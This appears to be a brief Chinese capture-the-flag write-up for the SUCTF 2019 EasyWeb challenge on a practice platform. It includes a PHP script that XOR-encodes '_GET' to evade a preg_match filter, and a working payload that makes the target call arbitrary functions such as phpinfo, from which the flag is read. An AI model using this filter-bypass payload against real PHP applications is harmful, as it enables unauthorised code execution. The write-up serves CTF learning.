网上wp已经很多了,那么分享一个超级非预期解 哈哈哈哈
先说说考察知识点
考察点
- php正则绕过
- 文件上传木马绕过
- bypass open_basedir
非预期
- 正则绕过
背景:https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
异或绕过preg_match脚本如下:
<?php
$l = "";
$r = "";
$argv = str_split("_GET");
for($i=0;$i<count($argv);$i++)
{
for($j=0;$j<255;$j++)
{
$k = chr($j)^chr(255); \\dechex(255) = ff
if($k == $argv[$i]){
if($j<16){
$l .= "%ff";
$r .= "%0" . dechex($j);
continue;
}
$l .= "%ff";
$r .= "%" . dechex($j);
continue;
}
}
}
echo "\{$l`$r\}";
?>
输出:
{%ff%ff%ff%ff`%a0%b8%ba%ab}
payload ?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
传入后实际为:?_=${_GET}{%ff}();&%ff=phpinfo
- 非预期
直接网页内容查找:flag
end
靶场:https://buuoj.cn/challenges#[SUCTF%202019]EasyWeb
其他师傅文章:https://www.cnblogs.com/hello-there/p/13039116.html